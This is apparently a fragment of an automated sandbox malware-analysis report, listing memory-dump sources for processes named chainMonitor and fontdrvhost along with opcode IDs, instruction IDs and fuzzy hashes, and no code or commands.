                • Instruction Fuzzy Hash: 2781DF31B0DA894FDB58DF5888605A977E3EFE9310B15417EE49EC32A6DE74AD02C780
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5e263845e041e1d6b7ea0cae1aea377e1125fe4fef5d2f87b2baf89531b77aae
                • Instruction ID: 7bb3972fb1e1bfc237fadc5b19d4960523767b483a95e5372f9e574d8aee6fb1
                • Opcode Fuzzy Hash: 5e263845e041e1d6b7ea0cae1aea377e1125fe4fef5d2f87b2baf89531b77aae
                • Instruction Fuzzy Hash: CD51ED31B08B894FDB58DF4888645BA77E2FFE9310B15427EE45AC7296CE74AC02C780
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 82b6252e4750089df9829a2d64c3f6051a842203089a3f8f1cb5fa91b430ac26
                • Instruction ID: 2d61d6f149bdd7e0ea7989fe00bc01dd7571edd837a9381225848c806ca6851c
                • Opcode Fuzzy Hash: 82b6252e4750089df9829a2d64c3f6051a842203089a3f8f1cb5fa91b430ac26
                • Instruction Fuzzy Hash: 76513D71E1991D8FEBA8EBA8D865BACB7F1FF58301F40007AD01DE7291DE7569818B40
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d0753aadc19a9fae34bb60f9ec098c793251e2de54ca8649caec71e8f25a7af1
                • Instruction ID: 7faada2b7af69d785082c74700cf2970c19989e6a2e481a6fe3c5fc304c89cc7
                • Opcode Fuzzy Hash: d0753aadc19a9fae34bb60f9ec098c793251e2de54ca8649caec71e8f25a7af1
                • Instruction Fuzzy Hash: 62514B70E0A60E8FEB64EB94C4646EDBBF2EF58301F514179D009E72A1DF786A44CB60
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a63c24a04715cdbd3cecd9fdbc29e4e694c890f914d9d01e7fc42250255f4b68
                • Instruction ID: 5ac8f5ddff8e28194064bfa6ebc8326cf4f44cd246fbd0c94c706b4123ca2274
                • Opcode Fuzzy Hash: a63c24a04715cdbd3cecd9fdbc29e4e694c890f914d9d01e7fc42250255f4b68
                • Instruction Fuzzy Hash: BA417831B0EB8E0FE765D7B888751B8BBE1EF86310B0545FBE44CC71A6DE68A9058351
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2bcbaf7a2bfd8bfaecc5341c35c33b6e814deb2ddccbf033cfe3aa8cbc96aa62
                • Instruction ID: 6db14c782c5bd03205adc1cfb291bc40596ed7fba3f7a022427642fdd3bc9d7a
                • Opcode Fuzzy Hash: 2bcbaf7a2bfd8bfaecc5341c35c33b6e814deb2ddccbf033cfe3aa8cbc96aa62
                • Instruction Fuzzy Hash: 3D31E230E1A64E5EEBA8EBA4C4786B97BE1FF2A304F01057ED01ED21E1DE646540C650
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 262ae2f5201b6183d9590cc8d9d62cecce3d3c0841b4d1c438654d4a9931c256
                • Instruction ID: 6f27135bde92bb47aedceb2b133b933fa532fee85601f91b332bf38cce9b6943
                • Opcode Fuzzy Hash: 262ae2f5201b6183d9590cc8d9d62cecce3d3c0841b4d1c438654d4a9931c256
                • Instruction Fuzzy Hash: 6911C131F0A50E4FE7A0EBA8C8695BD7BE2FF58700F4245BAD41CC70A6EE74A6448710
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a9f1db74fd1168ea3c0f62b85a5e6804482182891112418c7f087cc8d949350b
                • Instruction ID: 83442b1cd8a72ce2f88699d12fda7f110ece3151cf0a5007bbe39cd5ee425af0
                • Opcode Fuzzy Hash: a9f1db74fd1168ea3c0f62b85a5e6804482182891112418c7f087cc8d949350b
                • Instruction Fuzzy Hash: BB115E70E0A68E8FDB58EFA8C4696BD7BE1FF19300F4508BED419C71A1DB75A6408B10
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3f4c500646f5c453f504088c5583ca6f71ed86e59961a9f067a6aeb7325f63c5
                • Instruction ID: 3ded79cce7d3b37bcd1098b7899650a17d08776c67ef8cd79e0298d79f8551f8
                • Opcode Fuzzy Hash: 3f4c500646f5c453f504088c5583ca6f71ed86e59961a9f067a6aeb7325f63c5
                • Instruction Fuzzy Hash: 4601BC31E0A64E4FE7A5EBB489A86B97BE1EF19300F0245B6D408C70B2EA74E254C710
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aabd192d8a458538b4a0c57204d4d162202b51469f73e62546b35976b2ec81de
                • Instruction ID: e6733b2240aca13116c1bca929d1c5225646e6cb63de023a4cdafc686bb71d8a
                • Opcode Fuzzy Hash: aabd192d8a458538b4a0c57204d4d162202b51469f73e62546b35976b2ec81de
                • Instruction Fuzzy Hash: 12014F31E0A90E8FEB51EFA884585B97BE5FF18302F41497AD41DD31A5EB74A6808B50
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3b4f15d873071c9773a4180639eb5b999983628f330bb54767639d98901e2019
                • Instruction ID: 3b7350f6eae61afa8247f7390b751da38a075a065ea8c23e46f0d41564af46be
                • Opcode Fuzzy Hash: 3b4f15d873071c9773a4180639eb5b999983628f330bb54767639d98901e2019
                • Instruction Fuzzy Hash: 7201D870A0E78D4FD752A7B485695AD7BE1EF49300F0604F6C408C70B6DE74A5688711
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cf5e0b2825c017d8d5cc13a9b3aa01306072cb0e9aca35485b8c44242886765e
                • Instruction ID: 3d95f151886b0baa1aa5f8ab54816e7e522f9066a47b54256512b8f8febbe60a
                • Opcode Fuzzy Hash: cf5e0b2825c017d8d5cc13a9b3aa01306072cb0e9aca35485b8c44242886765e
                • Instruction Fuzzy Hash: ED018F30A0950E9FEBA8EF64C0686BA77E2EF69305F51447ED41EC21A0CAB5A640CB50
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7e01d2ce876eaa5f9492c93ce46bd1fd3502a6be947ba2037e4875bfd7a6263d
                • Instruction ID: 182e7e3622f03c3c628a2990cf1e55d98efd546f15988f4d1c66f4d06077e5eb
                • Opcode Fuzzy Hash: 7e01d2ce876eaa5f9492c93ce46bd1fd3502a6be947ba2037e4875bfd7a6263d
                • Instruction Fuzzy Hash: F1018630A1560E8EEB5CEBA4C5685B9B3A1FF1C305F11047EE41EC21E5DF75A550CA10
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a6f768e2676e99f6ff5ffe4892855ac613aa8ba53427c3afa0d5df801546cc73
                • Instruction ID: 8b78f3f57fafc1ee481a31cb9f2017cc2dee86f1584563ceb692fc9979788a71
                • Opcode Fuzzy Hash: a6f768e2676e99f6ff5ffe4892855ac613aa8ba53427c3afa0d5df801546cc73
                • Instruction Fuzzy Hash: 6201D130A1560E8BEB68EFA4C5696B9B3A1FF0C304F11087EE41EC21E5DF75A660CA10
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1fa616c0138f359700deba7947ac53812264075277e65bce1b79e947fe9edfb0
                • Instruction ID: 4d9c85dac307004198261750a83117ec1cf51304ac8003a5d61a290bf9d76e5d
                • Opcode Fuzzy Hash: 1fa616c0138f359700deba7947ac53812264075277e65bce1b79e947fe9edfb0
                • Instruction Fuzzy Hash: 9F01F930A0A68E8FDBA9DF14C4652F97BE1FF66300F51007AD40CC71A1DBB5A550C750
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 91dd53e2764c0bff646656ebaf333ef4cb3c76dc3810774a0538f33829a01d81
                • Instruction ID: 603f8126875a6080de5c5a74e9d5481bbf5b9dfcc4524843372795f4c1e87c68
                • Opcode Fuzzy Hash: 91dd53e2764c0bff646656ebaf333ef4cb3c76dc3810774a0538f33829a01d81
                • Instruction Fuzzy Hash: C901B530E0950E8FE774DB54C850AEDB3B2EB50710F008279C40DA72A0CE7466498F94
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f6e2fd273815d80df2d27adf33c4bfb85029c7e089116abe3631f66145101ce5
                • Instruction ID: 74d5bab669abd38b667f4e7951788319e3ad3889d6f976bb83eadbb2eac4ca01
                • Opcode Fuzzy Hash: f6e2fd273815d80df2d27adf33c4bfb85029c7e089116abe3631f66145101ce5
                • Instruction Fuzzy Hash: 97F0C23190E38D8FDB699FA089651E97F60AF1A200F4604BFE458C60E2DA78A918C711
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ed320d0183d42c61a34730e277e2c031478eb1f6b5ece7ae36435751f2d53663
                • Instruction ID: 87e129b1f10c850b2fb6876a607ad22aee206b1c70b9ef89fe26ff8c7d43ecca
                • Opcode Fuzzy Hash: ed320d0183d42c61a34730e277e2c031478eb1f6b5ece7ae36435751f2d53663
                • Instruction Fuzzy Hash: D4F02431A0A78E8FEB689FA084241F97BA0FF19300F4200BAF818C11E5DF78E5608710
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3cd457bb471e43ff6077805471366db2f7261754bf9bf22a4be582814702511d
                • Instruction ID: d11433c420ec7386300f62497417b36f9ca6aa764464d349e0380d821c57c313
                • Opcode Fuzzy Hash: 3cd457bb471e43ff6077805471366db2f7261754bf9bf22a4be582814702511d
                • Instruction Fuzzy Hash: 23F0F430E0590E8FEB64DB48CC54FAEB7B1EB94315F108266D40DD7254DE745A858F94
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6d59481e915d0eecf5c834ee0ee2b702a4409094ec294a6d9f951a1d898d9c13
                • Instruction ID: 76162520e2bcc56cd33a1618a191ef18b1d9e2d4e022b31df6635cd8498c1534
                • Opcode Fuzzy Hash: 6d59481e915d0eecf5c834ee0ee2b702a4409094ec294a6d9f951a1d898d9c13
                • Instruction Fuzzy Hash: E6E0BD30E0992D8EEBE4DB588C643A9B2B1EB18302F1140E9D40EE2290DE302A84AF10
                Memory Dump Source
                • Source File: 00000004.00000002.1810552040.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9baa0000_chainMonitor.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ac7a1329a316df95cc09e4671272a661e2f9cbb4893fecbdc5abc1eec89c8701
                • Instruction ID: 599ba8b05d6e88bc2c3572b88ff5e902eef7d3ad762691f80cce70a9ced2864e
                • Opcode Fuzzy Hash: ac7a1329a316df95cc09e4671272a661e2f9cbb4893fecbdc5abc1eec89c8701
                • Instruction Fuzzy Hash: 32C08C30D2264E8FEB64EF90AC214FDB370FF48208F401172E42CE3092DFB026108680
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5111de4732edafc15721d671fb272522d12aa55bd7ab0bd049aeb1aeb73a08fd
                • Instruction ID: 01d3a4c7c99c2bfc4e2ce7c26c505c918f58ce2f3c24a1595a59d6850161deea
                • Opcode Fuzzy Hash: 5111de4732edafc15721d671fb272522d12aa55bd7ab0bd049aeb1aeb73a08fd
                • Instruction Fuzzy Hash: 2562C131A0E78E8FE7A59B6488292F97BE1FF19310F0501BFE458C61B3DE6866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9ded6dea1e41d1b07d7665599c6f719d66feceba60fcd6a33c9bb09b2805c76c
                • Instruction ID: 9fe92dc3b119ae50496fc1595ff3611347e2bfe0ccd7845ccfd4b0e14d13aca8
                • Opcode Fuzzy Hash: 9ded6dea1e41d1b07d7665599c6f719d66feceba60fcd6a33c9bb09b2805c76c
                • Instruction Fuzzy Hash: 4A52D430A0E68E8FEB95EB6488696F97BE1FF19300F0105BEE419C71B2DE78A544C751
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 049d4dfc8be574a1813d21368cb910e88c49603788a32e1366da8c99f1171044
                • Instruction ID: 2d37a1570df72796fffc987bfaf9786f0eb51d1a23d27e2160c6a021d1c72b14
                • Opcode Fuzzy Hash: 049d4dfc8be574a1813d21368cb910e88c49603788a32e1366da8c99f1171044
                • Instruction Fuzzy Hash: 2342D530A0E68E8FEBA59F6488252F97BE1FF19310F0501BFE458C61F2DE7866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b918f01cbf005eeb5cf061fc99855134d79a8b56746a7d29c4941966c1261446
                • Instruction ID: 22404f8382a9f73ce6d3f2a2e01cb2d935a74beb2d39a5a94c3dc221698f0115
                • Opcode Fuzzy Hash: b918f01cbf005eeb5cf061fc99855134d79a8b56746a7d29c4941966c1261446
                • Instruction Fuzzy Hash: A742B130A0A64E8FEBA4EB6888696FD7BF1FF19300F0145BED419C71A2DE74A544CB51
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2521ebee44fb8653ef1fd757a971dba62b826e4c366ec5f85caa8c0104746db9
                • Instruction ID: a77ecfe8916b8d5431bdc379bbc56f2830b1e0afc0f3b53c48d28f97ee01c5f0
                • Opcode Fuzzy Hash: 2521ebee44fb8653ef1fd757a971dba62b826e4c366ec5f85caa8c0104746db9
                • Instruction Fuzzy Hash: 7A42D531A0E78E8FEBA59F6488252F97BE1FF19310F0501BEE458C61F2DE7866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a03c3cdd0f3d5a9abc9061c357509a35e48b49177fd3b7f0da14ef14f23db216
                • Instruction ID: b5e54a9b4f35b854348becfb7a56d0183439c1f991203e614e5687dcefd49608
                • Opcode Fuzzy Hash: a03c3cdd0f3d5a9abc9061c357509a35e48b49177fd3b7f0da14ef14f23db216
                • Instruction Fuzzy Hash: AAF1F430A0A64E8FEBA8EB64C8696B97BF1FF19300F0145BED41DC71A2DE746644CB41
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 69507741cf6c2afb9d1483196b016afee6b4d1211ee550a48974ea7ab3d65514
                • Instruction ID: 5904b5dbb416b0cf2b764bb110595d83d87c2ea37542948a580317593c6c552b
                • Opcode Fuzzy Hash: 69507741cf6c2afb9d1483196b016afee6b4d1211ee550a48974ea7ab3d65514
                • Instruction Fuzzy Hash: 58D1143090E78A4FE766DB68C8655A97FF1FF16300F0641FBD458CB0A3DA686648CB61
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6ec6a57113705f32bcf66b5ab9b1073b38d18ac81435f1a06ac205f36a5d8157
                • Instruction ID: 99974c7129d122d9a136e53dfa0048c171db1df8392ed21c14aacdf324a04a00
                • Opcode Fuzzy Hash: 6ec6a57113705f32bcf66b5ab9b1073b38d18ac81435f1a06ac205f36a5d8157
                • Instruction Fuzzy Hash: ECA1A330A0A64E8FDB55EB64C8686FE7BE1FF19300F0545BAD419C71A2DF78AA44CB11
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cf3a0abd6993b6fb98a65662ebb8308e006ab26215a53d803f137ecc14a4c821
                • Instruction ID: b619b2fb713518d947f214d630a7461ebd09bdde28bc1eeefdc4ae16ac12689c
                • Opcode Fuzzy Hash: cf3a0abd6993b6fb98a65662ebb8308e006ab26215a53d803f137ecc14a4c821
                • Instruction Fuzzy Hash: 12A19272A1994E8FEB98DB68C8657AD7BE1FF99314F50417AD01DC72D6CBB42801CB40
                Strings
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID: !$/
                • API String ID: 0-2633443642
                • Opcode ID: 73b88585df990de86deeaec5219026b8b66dc84a08460b270a21e8120d513a37
                • Instruction ID: 9b99e09192ceef221ed33092334529608fc34b9cb805f3150ccd9019b10b15de
                • Opcode Fuzzy Hash: 73b88585df990de86deeaec5219026b8b66dc84a08460b270a21e8120d513a37
                • Instruction Fuzzy Hash: E5111F70D0562DCBEB28DF94C8A47EDB3B2FB55301F0546A9D40EA7290CB745A85CF50
                Strings
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID: O_^
                • API String ID: 0-2524604163
                • Opcode ID: f30b0ca8dd1df93bbfa9fdfbc8fb5869e329aac3335842a9a28648c5f9f56d30
                • Instruction ID: 2502a98494afd8fa50193b4476eb1f5a30793104ef30e004c10f3873160d1f2a
                • Opcode Fuzzy Hash: f30b0ca8dd1df93bbfa9fdfbc8fb5869e329aac3335842a9a28648c5f9f56d30
                • Instruction Fuzzy Hash: 59F1FD70E0961D9EDBA4EB98C8657FDB7F2FF58301F0141BAD00DE32A1DA746A848B50
                Strings
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID: [}O
                • API String ID: 0-927243165
                • Opcode ID: 09df804b5876b873b0c4d44e6b29755de3bc225414255697196bc72e99efbc95
                • Instruction ID: dd4cf0bc77ef5d08950094a0ad88feeb03a90daba25737ceae46aea90af6d1f5
                • Opcode Fuzzy Hash: 09df804b5876b873b0c4d44e6b29755de3bc225414255697196bc72e99efbc95
                • Instruction Fuzzy Hash: 5281172770C92A4AE325B7ACB8655FD3740DF9533AB0902B7E588CD0E7EE1C2586C2D4
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 161b4db4e73320638101651c658a3bc2d27f614b72d9c07d9d565f548b4505fa
                • Instruction ID: cde47cb39e4111a30f66bbbb6c949bedd3cdbdd2bd21bde2fe529e86326fd014
                • Opcode Fuzzy Hash: 161b4db4e73320638101651c658a3bc2d27f614b72d9c07d9d565f548b4505fa
                • Instruction Fuzzy Hash: 6232D531A0E68E8FEBA59F6488252F97BE1FF19310F0501BFE458C61F2DE7866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5f787f1d823cd9531b92231bbc08e2e7b92a80510716bd2ed8055680d925d7dc
                • Instruction ID: 6529c4019a099b5815bad46ac6d4961988a2c71fda4457172fc91f52e1cd8f97
                • Opcode Fuzzy Hash: 5f787f1d823cd9531b92231bbc08e2e7b92a80510716bd2ed8055680d925d7dc
                • Instruction Fuzzy Hash: 5502E531A0E68E4FEBA5DF6488292F97BE1FF19310F0501BEE458C61F2DE7866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d701c0589f456376b0a4185b502501da867cc47cfbad997c8d14530265c1f800
                • Instruction ID: cfa8b2df843bda6bd8a4566c3b50ba4b58d04132fd16e92184830d4cd5a03ef1
                • Opcode Fuzzy Hash: d701c0589f456376b0a4185b502501da867cc47cfbad997c8d14530265c1f800
                • Instruction Fuzzy Hash: C802D631A0E68E4FEBA5DF6488292F97BE1FF19310F0501BEE458C61F2DE7866448752
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a728dee42d498a7d3e58658d8b58c3b842efe09e84faa07f4494b50d11792fac
                • Instruction ID: 101991a93341955168082a578f621aff2a118a55168af42a79db830e82486eae
                • Opcode Fuzzy Hash: a728dee42d498a7d3e58658d8b58c3b842efe09e84faa07f4494b50d11792fac
                • Instruction Fuzzy Hash: 9351B43094A28E4FDB5AEF7488695FA7BB1EF06304F0104BFD419C70E2DA796A45C751
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0815edc5b6cf962a99aa72226ce7872a06e84939b0b0b5c6dfa189ed38e39abe
                • Instruction ID: bc5d878a61829f92b1e51c43a9c1bb9dc273d49ea1a6445535508c3c6d09474a
                • Opcode Fuzzy Hash: 0815edc5b6cf962a99aa72226ce7872a06e84939b0b0b5c6dfa189ed38e39abe
